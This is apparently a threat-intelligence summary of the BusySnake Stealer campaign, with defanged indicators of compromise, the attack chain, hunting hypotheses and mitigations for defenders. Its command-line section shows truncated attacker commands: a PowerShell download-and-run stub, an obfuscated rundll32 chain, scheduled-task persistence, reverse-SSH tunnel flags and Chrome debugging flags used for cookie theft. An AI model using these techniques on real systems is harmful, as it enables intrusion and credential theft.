Armored Likho digging a snake pit: inside the covert BusySnake Stealer campaign
The Armored Likho APT group deploys a previously undocumented Python-based infostealer called BusySnake Stealer against government agencies and electric power sector organizations in Russia, Brazil, and Kazakhstan. The malware uses PyArmor Pro obfuscation, AI-generated first-stage loaders hosted on GitHub, and a modular C2 architecture to steal browser credentials, cookies, cryptocurrency wallets, 2FA secrets, Telegram data, and screenshots. The campaign demonstrates evolving TTPs including in-memory Python script execution, COM-based scheduled task persistence, and integrated reverse SSH tunneling that receives keys directly from the C2 server.
- domainarvax[.]xyzC2 domain hosting a LimeSurvey administration login page used as C2 panel interface
- domaingrked[.]onlineC2 domain used for stager hosting (web_script.txt), tunnel creation endpoints, and payload builder infrastructure
- domainlvl99[.]storeC2 domain used in BusySnake Stealer campaign infrastructure
- domainmyboard[.]chickenkiller[.]comC2 domain on dynamic DNS service used in BusySnake Stealer campaign
- domainmyboard[.]twilightparadox[.]comC2 domain on dynamic DNS service used in BusySnake Stealer campaign
- domainndrt[.]inkC2 domain used in BusySnake Stealer campaign infrastructure
- domainonetoken[.]inkC2 domain used in BusySnake Stealer campaign infrastructure
- domainvarenie[.]liveC2 domain used in BusySnake Stealer campaign infrastructure
- domainwinupdate[.]inkC2 domain mimicking Windows Update for command and control communications
- domainwinupdate[.]liveC2 domain mimicking Windows Update for command and control communications
- ip159[.]198[.]32[.]222SOCKS proxy host for reverse SSH tunneling — receives SSH connections from compromised hosts on port 2222
- ip159[.]198[.]41[.]140Primary C2 server for BusySnake Stealer — receives task polling requests via GET /get_task and status reports via POST /report_status
- ip159[.]198[.]75[.]219Additional C2 server IP associated with BusySnake Stealer campaign
- ip69[.]67[.]173[.]153C2 server IP observed in stealer configuration for task polling and data exfiltration
- md50041fd1b2358cd08dbcbc28ea8fc3d20EXE dropper — NSIS self-extracting archive
- md5006887732ca4a4a46a97989cf4deeef6RAR archive containing BusySnake Stealer payload
- md507213c419489c02791e8d67b91e404efDLL loader — malicious dynamic-link library for payload staging
- md51096268fa2b3d454c86cf851cb782319EXE dropper — NSIS self-extracting archive that launches decoy application and injects loader into pnx.exe
- md51dba3e505491a260a44c867902c3296eRAR archive containing malicious DLL loader
- md52dfa1d949872c1b2f04952dd3e5f5d8fLNK file — malicious shortcut exploiting ZDI-CAN-25373 to hide command line
- md5393b498f2114cabc0b29d5fcd9dc6723LNK file — malicious shortcut exploiting ZDI-CAN-25373 to hide command line
- md55d5c3e483c5e544260ce98fc29fbf192PS1 stager — first-stage malicious PowerShell script
- md56b45ddb39a6e86229348dcbba3857e7cRAR archive containing BusySnake Stealer payload
- md57141917cba2eee2b4d31107faccf3a39EXE stager — first-stage executable payload
- md5732c31acf971a81c7e51b2a3dae82020RAR archive containing BusySnake Stealer payload
- md578135f72ab148a0cc074f6b2dd51fff6DLL loader — malicious dynamic-link library for payload staging
- md57db9c688c620e54e8c69b7e52a7579fbBAT stager — first-stage batch script payload
- md580b7700053e115d65365ce7330383320New PYW version of BusySnake Stealer with in-memory Python execution and COM-based persistence
- md58188b2f347b77d65d08cfb23808ac244RAR archive containing BusySnake Stealer payload
- md5894332174f536c2e1efeda05cba79f8bDLL loader — malicious dynamic-link library for payload staging
- md590378881856abfa47d7745c0a3ef9dc8RAR archive containing advanced cookie extractor module
- md5a0ec7a8e61eff3f445a7455b3aef9fbbBAT stager — first-stage batch script payload
- md5ac553ec97a7b6715d79224bd0325149epnx.exe — legitimate executable dropped by NSIS installer used for process injection (observed in sandbox analysis)
- md5c019797a00fd56edb1f468ac0a598510BAT stager — first-stage batch script payload
- md5c7622a1effa27bbfee6d6e03d6474343BusySnake Stealer primary payload (PYW file) — Python-based infostealer obfuscated with PyArmor Pro
- md5cf74ac018d158ea2c2cfa1b1d71d95bcLNK file — malicious shortcut exploiting ZDI-CAN-25373 to hide command line
- md5ddff82a115558584bbd7741d4ffb35b4RAR archive containing BusySnake Stealer payload
- md5e2550cfad9dcc880bf04f6048f90868cRAR archive containing BusySnake Stealer payload
- md5f2ab09d7e7a375a192508a5014aa2ee4EXE dropper — NSIS self-extracting archive
- md5f5c6434ee5f7578faa3bc1257e1c9226EXE stager — first-stage executable payload
- md5fd2bdd8047addee6fde2f532de181bfdRAR archive containing BusySnake Stealer payload
- sha256265b69033cea7a918214a34cd9b17912909af46c7a47395dd7bb893e24507e59cmd.exe process spawned by obfuscated rundll32 command chain in LNK execution path
- urlhxxp://grked[.]online:8000/tunnel/create/?username=[redacted]HTTP endpoint for requesting reverse SSH tunnel configuration parameters from C2
- urlhxxps://github[.]com/leravalera2/dtfls/releases/download/pp/get-pip[.]pyGitHub-hosted get-pip.py script fetched by the loader to install pip and pull malware dependencies
- urlhxxps://github[.]com/mikkyanimal/myowndata/releases/download/mydata/data[.]zipGitHub-hosted archive containing the BusySnake Stealer module.pyw payload and PyArmor runtime components
- urlhxxps://grked[.]online/builder/weblnk/raw/177754924/web_script[.]txtPowerShell stager script downloaded and executed via iex by the LNK-based initial access vector
- urlhxxps://grked[.]online/tunnel/create/?username=[redacted]HTTPS endpoint for requesting reverse SSH tunnel configuration parameters from C2
Detection / Hunteropenrouter
What Happened
A hacking group called Armored Likho has been caught targeting government agencies and power companies in Russia, Brazil, and Kazakhstan using a new data-stealing program called BusySnake Stealer. The attackers send phishing emails disguised as official government notices or humanitarian aid applications, tricking victims into opening malicious attachments. Once installed, the software secretly steals passwords saved in web browsers, cookies (small files that keep you logged into websites), cryptocurrency wallet files, two-factor authentication codes, and Telegram account data. The attackers also set up hidden tunnels into victim computers for ongoing remote access. What makes this campaign notable is that the attackers appear to be using artificial intelligence to help write their malicious code, and they constantly change their tools to avoid detection by security software. Organizations in the targeted sectors should train employees to be suspicious of unexpected email attachments, ensure security software is up to date, and monitor for unusual scheduled tasks or Python processes on Windows computers.
Key Takeaways
- Previously undocumented Python-based infostealer dubbed BusySnake Stealer targets Windows systems, using PyArmor Pro 9.2.0 for runtime bytecode encryption to evade static and dynamic analysis.
- First-stage loaders and stagers appear AI-generated, featuring verbose comments and bullet-point emojis uncharacteristic of human-developed malware, enabling rapid payload polymorphism.
- Malware steals browser credentials (Chromium/Firefox), cookies, clipboard data, screenshots, cryptocurrency wallets, 2FA secrets, and Telegram session data, with modular C2 command dispatch.
- Built-in reverse SSH tunneling functionality (previously a standalone Go2Tunnel tool) receives private keys and SSH parameters directly from the C2 server, granting persistent remote access.
- Newer variant executes arbitrary Python scripts in-memory without writing to disk, dynamically installs dependencies via pip, and uses COM objects for stealthier scheduled task creation.
Affected Systems
- Windows systems (all versions supporting Python 3.12 and VBScript)
- Chromium-based browsers (Chrome, Edge)
- Mozilla Firefox
- Telegram Desktop
- RustDesk (abused for remote control)
Vulnerabilities (CVEs)
| CVE | Product | Severity | Description |
|---|---|---|---|
| ZDI-CAN-25373 | Windows Shortcut (LNK) files | Shortcut vulnerability allowing attackers to conceal command line contents using spaces or line breaks to hide execution parameters from user view. |
Attack Chain
- Initial Access: Spear-phishing emails deliver ZIP/RAR archives containing EXE droppers or LNK files themed as government notices or humanitarian aid applications
- Execution: EXE dropper (NSIS) launches decoy application, drops pnx.exe, and injects loader into its memory; LNK variant uses ZDI-CAN-25373 to hide obfuscated PowerShell that downloads stager from C2
- Staging: Loader fetches Python 3.12 interpreter, get-pip.py, and data.zip (containing module.pyw) from GitHub repositories into %APPDATA%\WindowsHelper directory
- Persistence: VBScript files create scheduled task named WindowsHelper executing module.pyw every 5 minutes; newer variant uses Schedule.Service COM object for stealthier task creation
- Collection and Exfiltration: BusySnake Stealer harvests clipboard data, file inventory, browser credentials (Chromium/Firefox via DPAPI and NSS), cookies, screenshots, crypto wallets, 2FA secrets, and Telegram session data, exfiltrating to C2 via HTTP
- Command and Control: Stealer polls C2 for commands, supports in-memory Python script execution, and establishes reverse SSH tunnels using private keys received from C2 server
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
- Platforms: Kaspersky Endpoint Detection and Response Expert (KEDR), Kaspersky Cloud Sandbox
Kaspersky detection rules referenced include shell_creation_by_rundll32, windows_command_shell_usage, and suspicious_powershell_cmd_or_script_spawning. Kaspersky Cloud Sandbox provides execution graph analysis. No public YARA, Sigma, Snort, or Suricata rules are provided in the article. Additional IOCs available via Kaspersky Threat Intelligence Reporting service.
Detection Engineering Assessment
| Dimension | Rating | Rationale |
|---|---|---|
| EDR Visibility | Medium | Process creation chains (rundll32->cmd->powershell, pnx.exe->python.exe) are visible to EDR. However, PyArmor runtime encryption, in-memory Python script execution without disk writes, and COM-based scheduled task creation reduce visibility into post-exploitation behavior. The use of pythonw.exe (PYW) running without a console window may also limit some telemetry. |
| Network Visibility | Medium | C2 communications use standard HTTP/HTTPS with custom User-Agent strings and predictable URL patterns (/get_task, /report_status, /api/v1/client/). GitHub downloads and SSH tunnel connections on port 2222 are network-visible. However, traffic to legitimate GitHub infrastructure may blend with normal user activity. |
| Detection Difficulty | Moderate | Initial access chain (rundll32->cmd->powershell) is detectable via standard process ancestry rules. Scheduled task creation and VBScript execution in AppData are suspicious behavioral signals. However, PyArmor obfuscation prevents static analysis, in-memory Python execution evades file-based detection, and abuse of legitimate GitHub infrastructure requires URL-level inspection rather than domain blocking. |
Required Log Sources
- Windows Security Event Log (Process Creation - Event ID 4688 with command line)
- Sysmon Event ID 1 (Process Create), Event ID 3 (Network Connection), Event ID 11 (File Create), Event ID 7 (Image Load)
- Windows Task Scheduler operational log
- DNS resolution logs
- HTTP/HTTPS proxy logs with URL and User-Agent inspection
- PowerShell Script Block Logging (Event ID 4104)
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Consider hunting for python.exe or pythonw.exe processes executing from non-standard directories under %APPDATA% or %LOCALAPPDATA%, particularly with .pyw script arguments, as this may indicate BusySnake Stealer execution. | Sysmon Event ID 1 (Process Create) with command line, EDR process telemetry | Execution | Medium — legitimate Python developers or applications may run Python from user directories; correlate with network connections to known C2 infrastructure or scheduled task creation. |
| Consider hunting for scheduled tasks named 'WindowsHelper' or 'MicrosoftOfficeUpdate' created via COM objects (Schedule.Service) rather than schtasks.exe, as this may indicate Armored Likho persistence. | Windows Task Scheduler operational log, Sysmon Event ID 1 for schtasks.exe or COM object invocation, EDR registry/object access telemetry | Persistence | Low — these specific task names in non-standard contexts are highly suspicious; verify against legitimate software that may use similar names. |
| Consider hunting for SSH processes with arguments containing ExitOnForwardFailure, StrictHostKeyChecking=no, and UserKnownHostsFile=/dev/null, as this pattern indicates reverse SSH tunnel establishment by BusySnake Stealer or Go2Tunnel. | Sysmon Event ID 1 (Process Create) with command line, EDR process telemetry | Command and Control | Low — while legitimate SSH usage exists, the specific combination of these flags with /dev/null for known hosts is highly indicative of malicious tunneling. |
| Consider hunting for processes accessing browser credential databases (Login State, logins.json, key4.db, cookies.sqlite) followed by file writes to %APPDATA%\WindowsHelper, as this may indicate credential and cookie harvesting by BusySnake Stealer. | Sysmon Event ID 11 (File Create), Event ID 1 (Process Create), EDR file access telemetry | Collection | Medium — legitimate browser extensions or password managers may access these files; correlate with writes to the specific WindowsHelper directory. |
| Consider hunting for Chrome or Edge processes launched with --remote-debugging-port and --load-extension flags pointing to temporary directories, as this indicates the cookie-stealing browser extension technique used by BusySnake Stealer. | Sysmon Event ID 1 (Process Create) with command line, EDR process telemetry | Collection | Low — these specific Chrome flags are rarely used in enterprise environments outside of development; investigate any occurrences. |
Control Gaps
- Static AV signatures likely miss PyArmor Pro 9.2.0 obfuscated Python bytecode that decrypts only at function call time
- File-based detection fails against newer variant that executes Python scripts in-memory without writing to disk
- Domain blocking on github.com is impractical; requires URL-level inspection of release download paths
- COM-based scheduled task creation via Schedule.Service may bypass detections focused on schtasks.exe command-line usage
- Browser credential theft via DPAPI and NSS operates within user security context, not triggering privilege escalation alerts
Key Behavioral Indicators
- Process chain: rundll32.exe -> cmd.exe -> powershell.exe with obfuscated environment variable reconstruction
- pythonw.exe or python.exe executing .pyw files from %APPDATA%\WindowsHelper\ directory
- Scheduled task named 'WindowsHelper' with 5-minute recurrence executing VBScript launcher
- VBScript files (run.vbs, wh_selfdelete.vbs) created in %APPDATA%\WindowsHelper\
- SSH process with arguments: -N -o ExitOnForwardFailure=yes -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null
- HTTP requests to /get_task?client_id= or /report_status endpoints with Edge User-Agent string
- Chrome launched with --remote-debugging-port and --load-extension pointing to non-standard directory
- SQLite database file inventory_state.db created in %APPDATA%\WindowsHelper\
- Lock file at %APPDATA%\WindowsHelper\screenshots.lock used for single-instance enforcement
- Downloads of python-3.12.10-embed-amd64.zip and get-pip.py from GitHub releases to %APPDATA%\WindowsHelper\
False Positive Assessment
Low — the combination of Python execution from %APPDATA%\WindowsHelper, scheduled tasks named WindowsHelper, SSH tunneling with specific flag patterns, and HTTP requests to identified C2 endpoints creates a highly specific detection profile. Individual indicators such as GitHub downloads or Python execution may generate false positives, but the full behavioral chain is distinctive.
Recommendations
Immediate Mitigation
- Verify against your organization's incident response runbook and team escalation paths before acting. Consider blocking the identified C2 IPs (159.198.41.140, 159.198.75.219, 159.198.32.222, 69.67.173.153) and domains at network perimeter controls if consistent with your blocking policies.
- Consider hunting across endpoints for the %APPDATA%\WindowsHelper\ directory, scheduled tasks named 'WindowsHelper', and SSH processes with the identified tunneling arguments.
- If your EDR supports it, consider searching for pythonw.exe or python.exe processes executing from %APPDATA% directories with network connections to the identified C2 infrastructure.
- Evaluate whether blocking the specific GitHub release URLs (github.com/mikkyanimal/myowndata, github.com/leravalera2/dtfls, github.com/Vitia2332) is feasible through your web filtering solution without impacting legitimate GitHub access.
Infrastructure Hardening
- Consider implementing network-level blocking for outbound SSH connections on non-standard ports (e.g., port 2222) from workstations if not required by business operations.
- Evaluate whether your email gateway can archive and scan ZIP/RAR attachments containing executable or LNK files, particularly those with government-themed filenames in Russian.
- If applicable, consider deploying DNS filtering for the identified C2 domains and dynamic DNS services (chickenkiller.com, twilightparadox.com) if not already blocked.
- Consider monitoring HTTP/HTTPS traffic for the specific C2 URL patterns (/get_task, /report_status, /api/v1/client/) and the Edge User-Agent string combined with requests to the identified IPs.
User Protection
- Consider enabling browser master passwords in Firefox where supported, as BusySnake Stealer exploits the lack of master password protection to decrypt credentials via PK11SDR_Decrypt.
- If your EDR supports application control, consider restricting python.exe and pythonw.exe execution from user-writable directories such as %APPDATA% and %TEMP%.
- Evaluate whether Chrome's --remote-debugging-port and --load-extension flags can be blocked or alerted on via your endpoint security solution.
- Consider enabling Windows Defender Credential Guard where applicable to protect DPAPI-protected browser master keys from being decrypted in user context.
Security Awareness
- Consider incorporating warnings about spear-phishing emails with government-themed attachments (psychological tests, humanitarian aid applications, debt clearance certificates) into existing awareness training programs, particularly for staff in government and energy sectors.
- If your organization operates in the targeted regions (Russia, Brazil, Kazakhstan), consider briefing relevant personnel on the heightened risk of targeted phishing campaigns using official-looking document lures.
- Consider reminding users to report suspicious emails with archive attachments containing executables or shortcut files, even if the sender appears legitimate.
MITRE ATT&CK Mapping
Initial Access
Execution
Collection
Command and Control
Additional IOCs
- Ips:
159[.]198[.]75[.]219- Additional C2 server IP associated with BusySnake Stealer campaign69[.]67[.]173[.]153- C2 server IP found in stealer configuration for HTTP communications
- Domains:
winupdate[.]live- C2 domain mimicking Windows Update for command and control communicationsvarenie[.]live- C2 domain used in BusySnake Stealer campaign infrastructurelvl99[.]store- C2 domain used in BusySnake Stealer campaign infrastructureonetoken[.]ink- C2 domain used in BusySnake Stealer campaign infrastructurewinupdate[.]ink- C2 domain mimicking Windows Update for command and control communicationsndrt[.]ink- C2 domain used in BusySnake Stealer campaign infrastructuremyboard[.]chickenkiller[.]com- C2 domain on dynamic DNS service used in BusySnake Stealer campaignmyboard[.]twilightparadox[.]com- C2 domain on dynamic DNS service used in BusySnake Stealer campaign
- Urls:
hxxps://grked[.]online/builder/weblnk/raw/177754924/web_script.txt- PowerShell stager script URL fetched by LNK downloader via irm/iexhxxps://github[.]com/mikkyanimal/myowndata/releases/download/mydata/data.zip- GitHub release asset containing BusySnake Stealer module.pyw payloadhxxps://github[.]com/leravalera2/dtfls/releases/download/pp/get-pip.py- GitHub-hosted get-pip.py script for installing pip package manager on victimhxxp://grked[.]online:8000/tunnel/create/?username=[redacted]- HTTP endpoint for requesting reverse SSH tunnel configuration parameters from C2hxxps://grked[.]online/tunnel/create/?username=[redacted]- HTTPS endpoint for requesting reverse SSH tunnel configuration parameters from C2
- File Hashes:
5D5C3E483C5E544260CE98FC29FBF192(MD5) - PS1 stager — first-stage malicious PowerShell script7141917CBA2EEE2B4D31107FACCF3A39(MD5) - EXE stager — first-stage executable payloadF5C6434EE5F7578FAA3BC1257E1C9226(MD5) - EXE stager — first-stage executable payloadC019797A00FD56EDB1F468AC0A598510(MD5) - BAT stager — first-stage batch script payloadA0EC7A8E61EFF3F445A7455B3AEF9FBB(MD5) - BAT stager — first-stage batch script payload7DB9C688C620E54E8C69B7E52A7579FB(MD5) - BAT stager — first-stage batch script payload90378881856ABFA47D7745C0A3EF9DC8(MD5) - RAR archive containing advanced cookie extractor module1DBA3E505491A260A44C867902C3296E(MD5) - RAR archive containing malicious DLL loaderF2AB09D7E7A375A192508A5014AA2EE4(MD5) - EXE dropper — NSIS self-extracting archive0041FD1B2358CD08DBCBC28EA8FC3D20(MD5) - EXE dropper — NSIS self-extracting archive894332174F536C2E1EFEDA05CBA79F8B(MD5) - DLL loader — malicious dynamic-link library for payload staging78135F72AB148A0CC074F6B2DD51FFF6(MD5) - DLL loader — malicious dynamic-link library for payload staging07213C419489C02791E8D67B91E404EF(MD5) - DLL loader — malicious dynamic-link library for payload staging393B498F2114CABC0B29D5FCD9DC6723(MD5) - LNK file — malicious shortcut exploiting ZDI-CAN-25373 to hide command lineCF74AC018D158EA2C2CFA1B1D71D95BC(MD5) - LNK file — malicious shortcut exploiting ZDI-CAN-25373 to hide command line2DFA1D949872C1B2F04952DD3E5F5D8F(MD5) - LNK file — malicious shortcut exploiting ZDI-CAN-25373 to hide command line80B7700053E115D65365CE7330383320(MD5) - New PYW version of BusySnake Stealer with in-memory Python execution and COM-based persistence6B45DDB39A6E86229348DCBBA3857E7C(MD5) - RAR archive containing BusySnake Stealer payload006887732CA4A4A46A97989CF4DEEEF6(MD5) - RAR archive containing BusySnake Stealer payload732C31ACF971A81C7E51B2A3DAE82020(MD5) - RAR archive containing BusySnake Stealer payloadDDFF82A115558584BBD7741D4FFB35B4(MD5) - RAR archive containing BusySnake Stealer payload8188B2F347B77D65D08CFB23808AC244(MD5) - RAR archive containing BusySnake Stealer payloadE2550CFAD9DCC880BF04F6048F90868C(MD5) - RAR archive containing BusySnake Stealer payloadFD2BDD8047ADDEE6FDE2F532DE181BFD(MD5) - RAR archive containing BusySnake Stealer payloadac553ec97a7b6715d79224bd0325149e(MD5) - pnx.exe — legitimate executable dropped by NSIS installer used for process injection (observed in sandbox analysis)265b69033cea7a918214a34cd9b17912909af46c7a47395dd7bb893e24507e59(SHA256) - cmd.exe process spawned by obfuscated rundll32 command chain in LNK execution path00be0651405e9323cc2f0812defcbb1d6817b58969d5ffd9fd72fc4783c6f4(SHA256) - rundll32.exe parent process executing obfuscated command to spawn cmd.exe in LNK execution path
- File Paths:
%APPDATA%\WindowsHelper\module.pyw- Primary BusySnake Stealer payload — Python script obfuscated with PyArmor Pro%APPDATA%\WindowsHelper\run.vbs- VBScript persistence launcher that executes module.pyw via python.exe and registers scheduled task%APPDATA%\WindowsHelper\wh_selfdelete.vbs- VBScript self-deletion script that wipes the initial pnx.exe loader from disk%APPDATA%\WindowsHelper\screenshots\.lock- Non-standard lock file used for single-instance enforcement instead of mutex or registry%APPDATA%\WindowsHelper\inventory_state.db- SQLite database tracking enumerated file metadata and discovered hex64 keys%APPDATA%\WindowsHelper\chromium_passwords.json- Decrypted Chromium browser credentials staged for exfiltration%APPDATA%\WindowsHelper\firefox_passwords.json- Decrypted Firefox browser credentials staged for exfiltration%APPDATA%\WindowsHelper\all_browser_data.json- Harvested browser cookies from all browsers staged for exfiltration%TEMP%\nsn5531.tmp\pnx.exe- Legitimate executable dropped by NSIS installer used as injection target for malicious loader
- Command Lines:
- Purpose: Persistence via scheduled task executing BusySnake Stealer every 5 minutes | Tools:
schtasks.exe,wscript.exe| Stage: Persistence |schtasks /create /tn "WindowsHelper" /tr "wscript.exe - Purpose: Obfuscated command execution via rundll32 spawning cmd.exe to reconstruct and run PowerShell payload | Tools:
rundll32.exe,cmd.exe| Stage: Execution |rundll32.exe shell32.dll,ShellExec_RunDLL cmd /v:on/c - Purpose: Download and execute stager script from C2 server via PowerShell | Tools:
powershell.exe| Stage: Initial Access |powershell.exe -w h -c "$s=irm - Purpose: Establish reverse SSH tunnel using parameters received from C2 server | Tools:
ssh| Stage: Command and Control - Purpose: Launch Chrome with debugging flags to load malicious cookie-stealing extension | Tools:
chrome.exe| Stage: Collection |chrome.exe --remote-debugging-port --load-extension
- Purpose: Persistence via scheduled task executing BusySnake Stealer every 5 minutes | Tools:
- Other:
github.com/mikkyanimal/myowndata- GitHub repository used to host BusySnake Stealer data.zip payload releasegithub.com/leravalera2/dtfls- GitHub repository used to host get-pip.py script for malware dependency installationgithub.com/Vitia2332- GitHub user account hosting repositories with malware releases including rdr, rd, pt, pp, dataex